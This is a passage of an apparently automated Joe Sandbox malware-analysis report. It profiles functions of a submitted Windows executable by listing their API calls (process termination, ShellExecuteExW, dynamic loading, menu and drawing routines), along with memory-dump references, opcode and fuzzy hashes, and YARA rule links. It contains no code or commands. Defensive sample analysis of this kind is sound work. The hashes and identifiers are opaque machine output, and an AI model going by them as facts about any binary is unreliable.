                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                      • String ID:
                                                                                      • API String ID: 1413079979-0
                                                                                      • Opcode ID: bd265ad736208532a25f2548808aa4844a3a51f0832e34b93e8c60e9593404c7
                                                                                      • Instruction ID: a7ab0a41f4f3a70a2f747693a9ce26931c2e5bf570dfca32e727aa6b74eb3b66
                                                                                      • Opcode Fuzzy Hash: bd265ad736208532a25f2548808aa4844a3a51f0832e34b93e8c60e9593404c7
                                                                                      • Instruction Fuzzy Hash: 8111377250120DABDF118FA8DD89FDE7BA9EF49748F088025FE19A2160C375CE64DB60
                                                                                      Function 00C33382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00C33379,00C32FE5), ref: 00C33390
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C3339E
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C333B7
                                                                                      • SetLastError.KERNEL32(00000000,?,00C33379,00C32FE5), ref: 00C33409
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: f08d8c1f541e69ac6ed5fb4ca4a19fd40ae0279b0a41dafe8ee0a810896d7506
                                                                                      • Instruction ID: 5282f95c41a0cf2035faebaefc449905457dff64e2e2a0e26eebdfc92b05e5d0
                                                                                      • Opcode Fuzzy Hash: f08d8c1f541e69ac6ed5fb4ca4a19fd40ae0279b0a41dafe8ee0a810896d7506
                                                                                      • Instruction Fuzzy Hash: 8C01FC3362E352BEEA1537757CC675F6F54EB15379F20822AF520851F0EF115E02A544
                                                                                      Function 00C42D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00C45686,00C53CD6,?,00000000,?,00C45B6A,?,?,?,?,?,00C3E6D1,?,00CD8A48), ref: 00C42D78
                                                                                      • _free.LIBCMT ref: 00C42DAB
                                                                                      • _free.LIBCMT ref: 00C42DD3
                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00C3E6D1,?,00CD8A48,00000010,00C14F4A,?,?,00000000,00C53CD6), ref: 00C42DE0
                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00C3E6D1,?,00CD8A48,00000010,00C14F4A,?,?,00000000,00C53CD6), ref: 00C42DEC
                                                                                      • _abort.LIBCMT ref: 00C42DF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 3160817290-0
                                                                                      • Opcode ID: ca11534c4a94321bdafe0233e52c5f152b01212705ec17b606aa92f72591365d
                                                                                      • Instruction ID: 9f92fb9d528a807a2e90e8bdb39cab40fec5c93ea01c579eaebf034efe114276
                                                                                      • Opcode Fuzzy Hash: ca11534c4a94321bdafe0233e52c5f152b01212705ec17b606aa92f72591365d
                                                                                      • Instruction Fuzzy Hash: 3EF0C832D05A0127C6226735BC4BF5E2669BFC27A5F740419F834931E2EF748901E160
                                                                                      Function 00CA8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C29639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C29693
                                                                                        • Part of subcall function 00C29639: SelectObject.GDI32(?,00000000), ref: 00C296A2
                                                                                        • Part of subcall function 00C29639: BeginPath.GDI32(?), ref: 00C296B9
                                                                                        • Part of subcall function 00C29639: SelectObject.GDI32(?,00000000), ref: 00C296E2
                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00CA8A4E
                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00CA8A62
                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00CA8A70
                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00CA8A80
                                                                                      • EndPath.GDI32(?), ref: 00CA8A90
                                                                                      • StrokePath.GDI32(?), ref: 00CA8AA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                      • String ID:
                                                                                      • API String ID: 43455801-0
                                                                                      • Opcode ID: 6c9679d85c7bf381e8683c0afedda8d4f08b9584b6c62aced81440dace4b715c
                                                                                      • Instruction ID: e0aeff70943373c35185885a3210e2507db008138e5294d4371857c6b0011cd4
                                                                                      • Opcode Fuzzy Hash: 6c9679d85c7bf381e8683c0afedda8d4f08b9584b6c62aced81440dace4b715c
                                                                                      • Instruction Fuzzy Hash: 8A11C97600015DFFDB129F94DC88FAE7F6DEB09354F048012BA199A1A1C7719E55DBA0
                                                                                      Function 00C751FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 00C75218
                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C75229
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C75230
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00C75238
                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C7524F
                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C75261
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDevice$Release
                                                                                      • String ID:
                                                                                      • API String ID: 1035833867-0
                                                                                      • Opcode ID: 717d7dfd5ce29b56335944d76196c09ac0d9967ca1600f5ca12b47b1ede77886
                                                                                      • Instruction ID: e4171eb19cfa9eaa1d8c990fbefe0965faaae8e9aee13a4ffd9d4492f6b943c1
                                                                                      • Opcode Fuzzy Hash: 717d7dfd5ce29b56335944d76196c09ac0d9967ca1600f5ca12b47b1ede77886
                                                                                      • Instruction Fuzzy Hash: 5E014F75A00718BBEB109BA59C89B5EBFB8EB49751F044065FA04A7281D6709D01CBA0
                                                                                      Function 00C11BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C11BF4
                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C11BFC
                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C11C07
                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C11C12
                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C11C1A
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C11C22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual
                                                                                      • String ID:
                                                                                      • API String ID: 4278518827-0
                                                                                      • Opcode ID: 9c15082eb30354213bfee99d28cc4a66c50fe0e994b0b705d7193683cdf9161c
                                                                                      • Instruction ID: a7fc62f9d2dc1e5aea39aadbbc8d434e70a7c89904136cb1b4317f693ad8562c
                                                                                      • Opcode Fuzzy Hash: 9c15082eb30354213bfee99d28cc4a66c50fe0e994b0b705d7193683cdf9161c
                                                                                      • Instruction Fuzzy Hash: 4F0167B0902B5ABDE3008F6A8C85B56FFE8FF19354F04411BA15C4BA42C7F5A864CBE5
                                                                                      Function 00C7EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C7EB30
                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C7EB46
                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00C7EB55
                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7EB64
                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7EB6E
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7EB75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                      • String ID:
                                                                                      • API String ID: 839392675-0
                                                                                      • Opcode ID: 6d69720ed31fa258d2ac85c50687409cf44d8b2f450bd7b3a3fecd70b3d7a905
                                                                                      • Instruction ID: 718fa6ef987be03163bcba1bf5523845c0ee8e921c6a998176010cffea87ad1c
                                                                                      • Opcode Fuzzy Hash: 6d69720ed31fa258d2ac85c50687409cf44d8b2f450bd7b3a3fecd70b3d7a905
                                                                                      • Instruction Fuzzy Hash: E0F05472241158BBE7215B629C4DFEF3E7CEFCBB15F004159F611D2091DBA05A01C6B5
                                                                                      Function 00C67439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?), ref: 00C67452
                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00C67469
                                                                                      • GetWindowDC.USER32(?), ref: 00C67475
                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00C67484
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00C67496
                                                                                      • GetSysColor.USER32(00000005), ref: 00C674B0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                      • String ID:
                                                                                      • API String ID: 272304278-0
                                                                                      • Opcode ID: eafee67606e2c2619e46f29636934ebbe62e6cf44b356fda308da569ef87e539
                                                                                      • Instruction ID: c19e8b44d815096e33fba5e8ce59a9d3c11b92a4f5f9d0ac0619a008162c6d64
                                                                                      • Opcode Fuzzy Hash: eafee67606e2c2619e46f29636934ebbe62e6cf44b356fda308da569ef87e539
                                                                                      • Instruction Fuzzy Hash: 9E018B31400215EFDB209FA4DD88BAE7BB5FB05319F140560F926A31A0CF311E51EF50
                                                                                      Function 00C71874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C7187F
                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00C7188B
                                                                                      • CloseHandle.KERNEL32(?), ref: 00C71894
                                                                                      • CloseHandle.KERNEL32(?), ref: 00C7189C
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C718A5
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C718AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                      • String ID:
                                                                                      • API String ID: 146765662-0
                                                                                      • Opcode ID: adf68bbd5a7d9e55fdf4a205740ca9824df66b3c664218c7c2b0bd85868cc687
                                                                                      • Instruction ID: 62bde819576f4fee5bef881085fd59299cc01cbe0ab32f26c32817fd50090999
                                                                                      • Opcode Fuzzy Hash: adf68bbd5a7d9e55fdf4a205740ca9824df66b3c664218c7c2b0bd85868cc687
                                                                                      • Instruction Fuzzy Hash: 85E0C236204101BBDA015BA1ED4CB8EBB69FB4AB26B108220F22582070CB329421DF50
                                                                                      Function 00C7C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C17620: _wcslen.LIBCMT ref: 00C17625
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C7C6EE
                                                                                      • _wcslen.LIBCMT ref: 00C7C735
                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C7C79C
                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C7C7CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                                      • String ID: 0
                                                                                      • API String ID: 1227352736-4108050209
                                                                                      • Opcode ID: 0cfd46f8156acd532d6fd6c974c192a82309c197b6c5c240bed15b607e7bc5a6
                                                                                      • Instruction ID: 8f7e2fbbbc95839fb9609261427835f5d0f13e08b286aa437e51fe39382d3b9b
                                                                                      • Opcode Fuzzy Hash: 0cfd46f8156acd532d6fd6c974c192a82309c197b6c5c240bed15b607e7bc5a6
                                                                                      • Instruction Fuzzy Hash: 1751E0716043029BD7189F29C8C5B6B77E8AF49310F048A2DF9A9D31E0DB70DA44DB52
                                                                                      Function 00C9AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00C9AEA3
                                                                                        • Part of subcall function 00C17620: _wcslen.LIBCMT ref: 00C17625
                                                                                      • GetProcessId.KERNEL32(00000000), ref: 00C9AF38
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C9AF67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                      • String ID: <$@
                                                                                      • API String ID: 146682121-1426351568
                                                                                      • Opcode ID: c9255c8dd3164918149ef7e820226113e250b1135058d0f561f8019d90c031a2
                                                                                      • Instruction ID: ce82d40013ed6299231c3e67edfd3d5aef691ff28be89dfea2edf210534ab247
                                                                                      • Opcode Fuzzy Hash: c9255c8dd3164918149ef7e820226113e250b1135058d0f561f8019d90c031a2
                                                                                      • Instruction Fuzzy Hash: F9713871A00219DFCF14DF94C488A9EBBF1EF09314F048499E816AB762CB75EE85DB91
                                                                                      Function 00C7719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C77206
                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C7723C
                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C7724D
                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C772CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                      • String ID: DllGetClassObject
                                                                                      • API String ID: 753597075-1075368562
                                                                                      • Opcode ID: da6130c0734fe0a5f8ac12bd44f513c1870dad31bbde2ac1b06d8e225452f560
                                                                                      • Instruction ID: 506bcb1d31aa68f733fe41f21b06f41c1d7810e488537d68825b2059f5e48b3e
                                                                                      • Opcode Fuzzy Hash: da6130c0734fe0a5f8ac12bd44f513c1870dad31bbde2ac1b06d8e225452f560
                                                                                      • Instruction Fuzzy Hash: E6418DB1A04208EFDB15CF54C885B9A7BA9EF45314F15C1A9BD19DF20AD7B0DA40DBA0
                                                                                      Function 00CA3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA3E35
                                                                                      • IsMenu.USER32(?), ref: 00CA3E4A
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CA3E92
                                                                                      • DrawMenuBar.USER32 ref: 00CA3EA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                      • String ID: 0
                                                                                      • API String ID: 3076010158-4108050209
                                                                                      • Opcode ID: 5fbdc4104f6fcf804c9f3c088e9fa71dcc12b050afb0a20e43081ba738e865c3
                                                                                      • Instruction ID: 23194faa5fed38004303c81a012b35da43568c2b3ba4519e145302458d167ca2
                                                                                      • Opcode Fuzzy Hash: 5fbdc4104f6fcf804c9f3c088e9fa71dcc12b050afb0a20e43081ba738e865c3
                                                                                      • Instruction Fuzzy Hash: 1A416A75A0124AEFDB10DF50D894AEABBB9FF4A358F04402AF9159B250D730AE50DF50
                                                                                      Function 00C71DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C73CCA
                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C71E66
                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C71E79
                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C71EA9
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 2081771294-1403004172
                                                                                      • Opcode ID: ed6268eb9aa062be82310d022327cd3b3b5cd921fd3d36c4283db7d327e6e824
                                                                                      • Instruction ID: 6089c48f3480e92414ed47c4ac14e59eaaa25bb9abe136cf502278b81864b2f3
                                                                                      • Opcode Fuzzy Hash: ed6268eb9aa062be82310d022327cd3b3b5cd921fd3d36c4283db7d327e6e824
                                                                                      • Instruction Fuzzy Hash: FC214971A00104BFDB149BA8DC5ADFFB7B8DF42354B148129FC69A31E0DB344A45A620
                                                                                      Function 00CA2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CA2F8D
